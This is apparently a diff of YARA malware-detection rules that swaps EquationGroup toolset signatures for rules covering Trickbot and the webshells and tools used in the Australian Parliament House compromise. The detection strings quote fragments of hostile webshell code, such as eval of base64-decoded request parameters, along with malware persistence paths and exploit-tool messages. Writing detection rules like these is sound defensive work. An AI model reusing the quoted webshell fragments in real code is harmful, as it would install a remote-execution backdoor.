+		hash2 = "57b8ea2870f5176a30e6cba2d717fb3ff342f8bd36bac652dc4194a313b5fa64"
+		hash3 = "d75561a744e3ed45dfbf25fe7c120bd24c38138ac469fd02e383dd455a540334"
+		hash4 = "57b8ea2870f5176a30e6cba2d717fb3ff342f8bd36bac652dc4194a313b5fa64"
+		hash5 = "e92dd00b092b435420f0996e4f557023fe1436110a11f0f61fbb628b959aac99"
 
 	strings:
-		$s1 = "NtErrorMoreProcessingRequired" fullword ascii
-		$s2 = "Command Format Error: Error=%x" fullword ascii
-		$s3 = "NtErrorPasswordRestriction" fullword ascii
-		$op0 = { 8a 85 58 ff ff ff 88 43 4d }
+		$s1 = "Decrypt Shell Fail" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 600KB and 2 of them )
+		uint16( 0 ) == 0x5a4d and filesize <= 2000KB and ( 1 of them or pe.imphash ( ) == "4e3fbfbf1fc23f646cd40a6fe09385a7" )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Eternalromance_2 : FILE
+rule SIGNATURE_BASE_MAL_Trickbot_Oct19_4 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects Trickbot malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "40066023-ede9-5669-8b4d-a26a693d8818"
-		date = "2017-04-15"
+		id = "dcadaa50-52ae-5ded-b40e-149f28092093"
+		date = "2019-10-02"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1872-L1889"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_trickbot.yar#L58-L77"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "481a08bc73ac66245c0712599a61cccdf5127276a09a67cf894f76b7763c5c9b"
+		logic_hash = "c109510d86260b4173bbbac5fe69936acb109e7fdbe71fbe2955e5ed85f5cd85"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "f1ae9fdbb660aae3421fd3e5b626c1e537d8e9ee2f9cd6d56cb70b6878eaca5d"
-		hash2 = "b99c3cc1acbb085c9a895a8c3510f6daaf31f0d2d9ccb8477c7fb7119376f57b"
-		hash3 = "92c6a9e648bfd98bbceea3813ce96c6861487826d6b2c3d462debae73ed25b34"
+		hash1 = "25a4ae2a1ce6dbe7da4ba1e2559caa7ed080762cf52dba6c8b55450852135504"
+		hash2 = "e92dd00b092b435420f0996e4f557023fe1436110a11f0f61fbb628b959aac99"
+		hash3 = "aabf54eb27de3d72078bbe8d99a92f5bcc1e43ff86774eb5321ed25fba5d27d4"
+		hash4 = "9ecc794ec77ce937e8c835d837ca7f0548ef695090543ed83a7adbc07da9f536"
 
 	strings:
-		$x1 = "[+] Backdoor shellcode written" fullword ascii
-		$x2 = "[*] Attempting exploit method %d" fullword ascii
+		$x1 = "c:\\users\\user\\documents\\visual studio 2005\\projects\\adzxser\\release\\ADZXSER.pdb" fullword ascii
+		$x2 = "http://root-hack.org" fullword ascii
+		$x3 = "http://hax-studios.net" fullword ascii
+		$x4 = "5OCFBBKCAZxWUE#$_SVRR[SQJ" fullword ascii
+		$x5 = "G*\\AC:\\Users\\911\\Desktop\\cButtonBar\\cButtonBar\\ButtonBar.vbp" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 600KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize <= 2000KB and 1 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__Emphasismine : FILE
+rule SIGNATURE_BASE_MAL_Trickbot_Oct19_5 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects Trickbot malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cc684f39-4971-52e0-b5ec-d28c7ce7032b"
-		date = "2017-04-15"
+		id = "b3034f0c-5fd9-58a2-866f-9100e3a56f39"
+		date = "2019-10-02"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1891-L1910"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_trickbot.yar#L79-L96"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "20ec32f5e9e439fb212985d5ae104ae5742231f594423cd125a9e64ed6eb234a"
+		logic_hash = "e304b236dd58faa0e6fdd73bc93c24f6ff0ec6c1f9a54b104f8e87441834e22b"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "dcaf91bd4af7cc7d1fb24b5292be4e99c7adf4147892f6b3b909d1d84dd4e45b"
-		hash2 = "348eb0a6592fcf9da816f4f7fc134bcae1b61c880d7574f4e19398c4ea467f26"
+		hash1 = "58852140a2dc30e799b7d50519c56e2fd3bb506691918dbf5d4244cc1f4558a2"
+		hash2 = "aabf54eb27de3d72078bbe8d99a92f5bcc1e43ff86774eb5321ed25fba5d27d4"
+		hash3 = "9ecc794ec77ce937e8c835d837ca7f0548ef695090543ed83a7adbc07da9f536"
+		hash4 = "9d6e4ad7f84d025bbe9f95e74542e7d9f79e054f6dcd7b37296f01e7edd2abae"
 
 	strings:
-		$x1 = "Error: Could not calloc() for shellcode buffer" fullword ascii
-		$x2 = "shellcodeSize: 0x%04X + 0x%04X + 0x%04X = 0x%04X" fullword ascii
-		$x3 = "Generating shellcode" fullword ascii
-		$x4 = "([0-9a-zA-Z]+) OK LOGOUT completed" fullword ascii
-		$x5 = "Error: Domino is not the expected version. (%s, %s)" fullword ascii
+		$s1 = "LoadShellCode" fullword ascii
+		$s2 = "pShellCode" fullword ascii
+		$s3 = "InitShellCode" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize <= 2000KB and 2 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Eternalromance : FILE
+rule SIGNATURE_BASE_MAL_Trickbot_Oct19_6 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects Trickbot malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "40066023-ede9-5669-8b4d-a26a693d8818"
-		date = "2017-04-15"
+		id = "5feb8d34-4974-5315-a5f9-79a3fac83d1d"
+		date = "2019-10-02"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1912-L1930"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_trickbot.yar#L98-L115"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "757740038b9b1e1d099bb208104e9f48e7eb57ffb2de09e83c66df7914b816cb"
+		logic_hash = "599b1f56483f4ea267595b90dd4ef93b7e2147e4a0d8449cdd9d2539a96c3f79"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "f1ae9fdbb660aae3421fd3e5b626c1e537d8e9ee2f9cd6d56cb70b6878eaca5d"
-		hash2 = "b99c3cc1acbb085c9a895a8c3510f6daaf31f0d2d9ccb8477c7fb7119376f57b"
+		hash1 = "cf99990bee6c378cbf56239b3cc88276eec348d82740f84e9d5c343751f82560"
+		hash2 = "cf99990bee6c378cbf56239b3cc88276eec348d82740f84e9d5c343751f82560"
 
 	strings:
-		$x1 = "[-] Error: Exploit choice not supported for target OS!!" fullword ascii
-		$x2 = "Error: Target machine out of NPP memory (VERY BAD!!) - Backdoor removed" fullword ascii
-		$x3 = "[-] Error: Backdoor not present on target" fullword ascii
-		$x4 = "***********    TARGET ARCHITECTURE IS X64    ************" fullword ascii
+		$x1 = "D:\\MyProjects\\spreader\\Release\\ssExecutor_x86.pdb" fullword ascii
+		$s1 = "%s\\appdata\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\%s" fullword ascii
+		$s2 = "%s\\appdata\\roaming\\%s" fullword ascii
+		$s3 = "WINDOWS\\SYSTEM32\\TASKS" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them ) or 2 of them
+		uint16( 0 ) == 0x5a4d and filesize <= 400KB and ( 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Gen4 : FILE
+rule SIGNATURE_BASE_APT_Webshell_Tiny_1 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detetcs a tiny webshell involved in the Australian Parliament House network compromise"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f935c942-02a4-59b3-89ce-e5e3fa1cacda"
-		date = "2017-04-15"
+		id = "e65a8920-0684-5aae-a2b8-079c2beae08a"
+		date = "2019-02-18"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1932-L1963"
+		reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_aus_parl_compromise.yar#L12-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "68a85b4109a2222dce0625aae8a55541206b9275236232e5049e5b4ee28d8e52"
+		logic_hash = "277162f720195c94d36fd3350d0dda785007e8cc6ed2ab2aa1a6a6262f2993fa"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "fe7ce2fdb245c62e4183c728bc97e966a98fdc8ffd795ed09da23f96e85dcdcd"
-		hash2 = "0989bfe351342a7a1150b676b5fd5cbdbc201b66abcb23137b1c4de77a8f61a6"
-		hash3 = "270850303e662be53d90fa60a9e5f4bd2bfb95f92a046c77278257631d9addf4"
-		hash4 = "7a086c0acb6df1fa304c20733f96e898d21ca787661270f919329fadfb930a6e"
-		hash5 = "c236e0d9c5764f223bd3d99f55bd36528dfc0415e14f5fde1e5cdcada14f4ec0"
-		hash6 = "9d98e044eedc7272823ba8ed80dff372fde7f3d1bece4e5affb21e16f7381eb2"
-		hash7 = "dfce29df4d198c669a87366dd56a7426192481d794f71cd5bb525b08132ed4f7"
-		hash8 = "87fdc6c32b9aa8ae97c7efbbd5c9ae8ec5595079fc1488f433beef658efcb4e9"
-		hash9 = "722f034ba634f45c429c7dafdbff413c08976b069a6b30ec91bfa5ce2e4cda26"
-		hash10 = "d94b99908f528fa4deb56b11eac29f6a6e244a7b3aac36b11b807f2f74c6d8be"
-		hash11 = "4b07d9d964b2c0231c1db7526237631bb83d0db80b3c9574cc414463703462d3"
-		hash12 = "30b63abde1e871c90df05137ec08df3fa73dedbdb39cb4bd2a2df4ca65bc4e53"
-		hash13 = "02c1b08224b7ad4ac3a5b7b8e3268802ee61c1ec30e93e392fa597ae3acc45f7"
-		hash14 = "690f09859ddc6cd933c56b9597f76e18b62a633f64193a51f76f52f67bc2f7f0"
 
 	strings:
-		$x1 = "[+] \"TargetPort\"      %hu" fullword ascii
-		$x2 = "---<<<  Complete  >>>---" fullword ascii
-		$x3 = "[+] \"NetworkTimeout\"  %hu" fullword ascii
-		$op1 = { 46 83 c4 0c 83 fe 0c 0f 8c 5e ff ff ff b8 }
+		$x1 = "eval(" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 150KB and ( 1 of ( $x* ) or 2 of them ) )
+		( uint16( 0 ) == 0x3f3c or uint16( 0 ) == 0x253c ) and filesize < 40 and $x1
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Gen1 : FILE
+rule SIGNATURE_BASE_APT_Webshell_AUS_Tiny_2 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detetcs a tiny webshell involved in the Australian Parliament House network compromise"
 		author = "Florian Roth (Nextron Systems)"
-		id = "98b0a398-7761-5506-bd2f-117c118df11f"
-		date = "2017-04-15"
+		id = "4746d4ce-628a-59b0-9032-7e0759d96ad3"
+		date = "2019-02-18"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1965-L1984"
+		reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_aus_parl_compromise.yar#L25-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cd40d51ba26706517dae332d84f574eb206a424693cfb586375695e364990b5d"
+		logic_hash = "e26c265d2b1606257d8c843921601f14cae2beaf246f8e37daeeb6c5ff12f289"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "1b5b33931eb29733a42d18d8ee85b5cd7d53e81892ff3e60e2e97f3d0b184d31"
-		hash2 = "139697168e4f0a2cc73105205c0ddc90c357df38d93dbade761392184df680c7"
+		hash1 = "0d6209d86f77a0a69451b0f27b476580c14e0cda15fa6a5003aab57a93e7e5a5"
 
 	strings:
-		$x1 = "Restart with the new protocol, address, and port as target." fullword ascii
-		$x2 = "TargetPort      : %s (%u)" fullword ascii
-		$x3 = "Error: strchr() could not find '@' in account name." fullword ascii
-		$x4 = "TargetAcctPwd   : %s" fullword ascii
-		$x5 = "Creating CURL connection handle..." fullword ascii
+		$x1 = "Request.Item[System.Text.Encoding.UTF8.GetString(Convert.FromBase64String(\"[password]\"))];" ascii
+		$x2 = "eval(arguments,System.Text.Encoding.UTF8.GetString(Convert.FromBase64String(\"" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 80KB and 1 of them )
+		( uint16( 0 ) == 0x3f3c or uint16( 0 ) == 0x253c ) and filesize < 1KB and 1 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Gen2 : FILE
+rule SIGNATURE_BASE_APT_Webshell_AUS_Jscript_3 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detetcs a webshell involved in the Australian Parliament House network compromise"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e47de7dd-8a37-5d0d-9af2-2a30fa000b05"
-		date = "2017-04-15"
+		id = "ff7e780b-ccf9-53b6-b741-f04a8cbaf580"
+		date = "2019-02-18"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1986-L2012"
+		reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_aus_parl_compromise.yar#L40-L53"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2c0833e92e23d595ebcf4af042febc44fba594356a647eb98e48b6fabf018d72"
+		logic_hash = "e144e555dd80e15ac9072a645e629a86ca1a6b52949d236ec3daedbf06bd6718"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "7fe425cd040608132d4f4ab2671e04b340a102a20c97ffdcf1b75be43a9369b5"
-		hash2 = "561c0d4fc6e0ff0a78613d238c96aed4226fbb7bb9ceea1d19bc770207a6be1e"
-		hash3 = "f2e90e04ddd05fa5f9b2fec024cd07365aebc098593d636038ebc2720700662b"
-		hash4 = "8f7e10a8eedea37ee3222c447410fd5b949bd352d72ef22ef0b2821d9df2f5ba"
+		hash1 = "7ac6f973f7fccf8c3d58d766dec4ab7eb6867a487aa71bc11d5f05da9322582d"
 
 	strings:
-		$s1 = "[+] Setting password : (NULL)" fullword ascii
-		$s2 = "[-] TbBuffCpy() failed!" fullword ascii
-		$s3 = "[+] SMB negotiation" fullword ascii
-		$s4 = "12345678-1234-ABCD-EF00-0123456789AB" fullword ascii
-		$s5 = "Value must end with 0000 (2 NULLs)" fullword ascii
-		$s6 = "[*] Configuring Payload" fullword ascii
-		$s7 = "[*] Connecting to listener" fullword ascii
-		$op1 = { b0 42 40 00 89 44 24 30 c7 44 24 34 }
-		$op2 = { eb 59 8b 4c 24 10 68 1c 46 }
+		$s1 = "<%@ Page Language=\"Jscript\" validateRequest=\"false\"%><%try{eval(System.Text.Encoding.UTF8.GetString(Convert.FromBase64String" ascii
+		$s2 = ".Item[\"[password]\"])),\"unsafe\");}" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 80KB and 1 of ( $s* ) and 1 of ( $op* ) ) or 3 of them
+		uint16( 0 ) == 0x6568 and filesize < 1KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Gen3 : FILE
+rule SIGNATURE_BASE_APT_Webshell_AUS_4 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detetcs a webshell involved in the Australian Parliament House network compromise"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7951fac1-9d5f-5991-a19a-88f3c8402e39"
-		date = "2017-04-15"
+		id = "bb5b10d1-3528-5361-92fc-8440c65dcda4"
+		date = "2019-02-18"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2014-L2042"
+		reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_aus_parl_compromise.yar#L56-L71"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "99b293d441fd27a6295e6a93123cf45e787472fb61575d566e7b4e0c61226fdb"
+		logic_hash = "4a4f26b50631021979e4a8246a1e1c10150f4fb03eb7d77a1042e41ef57b3961"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "270850303e662be53d90fa60a9e5f4bd2bfb95f92a046c77278257631d9addf4"
-		hash2 = "7a086c0acb6df1fa304c20733f96e898d21ca787661270f919329fadfb930a6e"
-		hash3 = "c236e0d9c5764f223bd3d99f55bd36528dfc0415e14f5fde1e5cdcada14f4ec0"
-		hash4 = "9d98e044eedc7272823ba8ed80dff372fde7f3d1bece4e5affb21e16f7381eb2"
-		hash5 = "dfce29df4d198c669a87366dd56a7426192481d794f71cd5bb525b08132ed4f7"
-		hash6 = "87fdc6c32b9aa8ae97c7efbbd5c9ae8ec5595079fc1488f433beef658efcb4e9"
-		hash7 = "722f034ba634f45c429c7dafdbff413c08976b069a6b30ec91bfa5ce2e4cda26"
-		hash8 = "d94b99908f528fa4deb56b11eac29f6a6e244a7b3aac36b11b807f2f74c6d8be"
-		hash9 = "4b07d9d964b2c0231c1db7526237631bb83d0db80b3c9574cc414463703462d3"
-		hash10 = "30b63abde1e871c90df05137ec08df3fa73dedbdb39cb4bd2a2df4ca65bc4e53"
-		hash11 = "02c1b08224b7ad4ac3a5b7b8e3268802ee61c1ec30e93e392fa597ae3acc45f7"
-		hash12 = "690f09859ddc6cd933c56b9597f76e18b62a633f64193a51f76f52f67bc2f7f0"
+		hash1 = "83321c02339bb51735fbcd9a80c056bd3b89655f3dc41e5fef07ca46af09bb71"
 
 	strings:
-		$s1 = "Logon failed.  Kerberos ticket not yet valid (target and KDC times not synchronized)" fullword ascii
-		$s2 = "[-] Could not set \"CredentialType\"" fullword ascii
-		$op1 = { 46 83 c4 0c 83 fe 0c 0f 8c 5e ff ff ff b8 }
+		$s1 = "wProxy.Credentials = new System.Net.NetworkCredential(pusr, ppwd);" fullword ascii
+		$s2 = "{return System.Text.Encoding.UTF8.GetString(Convert.FromBase64String(" ascii
+		$s3 = ".Equals('User-Agent', StringComparison.OrdinalIgnoreCase))" ascii
+		$s4 = "gen.Emit(System.Reflection.Emit.OpCodes.Ret);" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 150KB and 2 of them )
+		uint16( 0 ) == 0x7566 and filesize < 10KB and 3 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Yak : FILE
+rule SIGNATURE_BASE_APT_Script_AUS_4 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detetcs a script involved in the Australian Parliament House network compromise"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e5562d1a-7980-5fb8-b098-2e26003fb159"
-		date = "2017-04-15"
+		id = "5cbf2476-5ce8-540d-b87b-e400daf49b43"
+		date = "2019-02-18"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2054-L2070"
+		reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_aus_parl_compromise.yar#L73-L90"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "69b9514508f557376d876262793e5650289abfeeeee8b5ca9beaf42f3ec4d64c"
+		logic_hash = "3a81365572380964abe07a1ec16a9ea299bf16a4e624285faaa6f72c44f762d2"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "66ff332f84690642f4e05891a15bf0c9783be2a64edb2ef2d04c9205b47deb19"
+		hash1 = "fdf15f388a511a63fbad223e6edb259abdd4009ec81fcc87ce84f0f2024c8057"
 
 	strings:
-		$x1 = "-xd = dump archive data & store in scancodes.txt" fullword ascii
-		$x2 = "-------- driver start token -------" fullword wide
-		$x3 = "-------- keystart token -------" fullword wide
-		$x4 = "-xta = same as -xt but show special chars & store in keys_all.txt" fullword ascii
+		$x1 = "myMutex = CreateMutex(0, 1, \"teX23stNew\")" fullword ascii
+		$x2 = "mmpath = Environ(appdataPath) & \"\\\" & \"Microsoft\" & \"\\\" & \"mm.accdb\"" fullword ascii
+		$x3 = "Dim mmpath As String, newmmpath  As String, appdataPath As String" fullword ascii
+		$x4 = "'MsgBox \"myMutex Created\" Do noting" fullword ascii
+		$x5 = "appdataPath = \"app\" & \"DatA\"" fullword ascii
+		$x6 = ".DoCmd.Close , , acSaveYes" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 800KB and 2 of them )
+		filesize < 7KB and 1 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Aduser_Implant : FILE
+rule SIGNATURE_BASE_APT_Webshell_AUS_5 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detetcs a webshell involved in the Australian Parliament House network compromise"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4ba152c8-aa81-5558-8ad3-c62aa3231dab"
-		date = "2017-04-15"
+		id = "59b3f6aa-2d3b-54b4-b543-57bd9d981e87"
+		date = "2019-02-18"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2072-L2086"
+		reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_aus_parl_compromise.yar#L92-L111"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d378773f4acd850e5a8d92d6cce84d57f659330edc025565cf4bc34afb0a6ae6"
+		logic_hash = "fb0e53e5561f7f14f2ad6afcda2798d353cf4d54d12ae3354b03d62ed0c00bf3"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fd2efb226969bc82e2e38769a10a8a751138db69f4594a8de4b3c0522d4d885f"
+		hash1 = "54a17fb257db2d09d61af510753fd5aa00537638a81d0a8762a5645b4ef977e4"
 
 	strings:
-		$s1 = ".?AVFeFinallyFailure@@" fullword ascii
-		$s2 = "(&(objectCategory=person)(objectClass=user)(cn=" fullword wide
+		$a1 = "function DEC(d){return System.Text.Encoding.UTF8.GetString(Convert.FromBase64String(d));}" fullword ascii
+		$a2 = "function ENC(d){return Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(d));}" fullword ascii
+		$s1 = "var hash=DEC(Request.Item['" ascii
+		$s2 = "Response.Write(ENC(SET_ASS_SUCCESS));" fullword ascii
+		$s3 = "hashtable[hash] = assCode;" fullword ascii
+		$s4 = "Response.Write(ss);" fullword ascii
+		$s5 = "var hashtable = Application[CachePtr];" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 40KB and all of them )
+		uint16( 0 ) == 0x7566 and filesize < 2KB and 4 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Remoteexecute_Implant : FILE
+rule SIGNATURE_BASE_HKTL_Lazycat_Logeraser
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detetcs a tool used in the Australian Parliament House network compromise"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5fa5ff71-42fa-58e2-a826-341fb73ea08a"
-		date = "2017-04-15"
+		id = "a3d74657-a389-5482-ab26-966e790afd50"
+		date = "2019-02-18"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2088-L2112"
+		reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_aus_parl_compromise.yar#L113-L135"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "aa46cb188ba820199c013633ade72ab1c8bea316384042e9e3b5098c439841a5"
+		logic_hash = "2b4b69dd675172b9b0c08fac674b6daa107535694b4073750501627fb48d12c2"
 		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "770663c07c519677316934cf482e500a73540d9933342c425f3e56258e6e6d8b"
+		quality = 35
+		tags = ""
+		hash1 = "1c113dce265e4d744245a7c55dadc80199ae972a9e0ecbd0c5ced57067cf755b"
+		hash2 = "510375f8142b3651df67d42c3eff8d2d880987c0e057fc75a5583f36de34bf0e"
 
 	strings:
-		$op1 = { 53 00 63 00 68 00 65 00 64 00 75 00 6C 00 65 00
-               00 00 00 00 53 00 65 00 72 00 76 00 69 00 63 00
-               65 00 73 00 41 00 63 00 74 00 69 00 76 00 65 00
-               00 00 00 00 FF FF FF FF 00 00 00 00 B0 17 00 68
-               5C 00 70 00 69 00 70 00 65 00 5C 00 53 00 65 00
-               63 00 6F 00 6E 00 64 00 61 00 72 00 79 00 4C 00
-               6F 00 67 00 6F 00 6E 00 00 00 00 00 5C 00 00 00
-               57 00 69 00 6E 00 53 00 74 00 61 00 30 00 5C 00
-               44 00 65 00 66 00 61 00 75 00 6C 00 74 00 00 00
-               6E 00 63 00 61 00 63 00 6E 00 5F 00 6E 00 70 00
-               00 00 00 00 5C 00 70 00 69 00 70 00 65 00 5C 00
-               53 00 45 00 43 00 4C 00 4F 00 47 00 4F 00 4E }
+		$x1 = "LazyCat.dll" ascii wide fullword
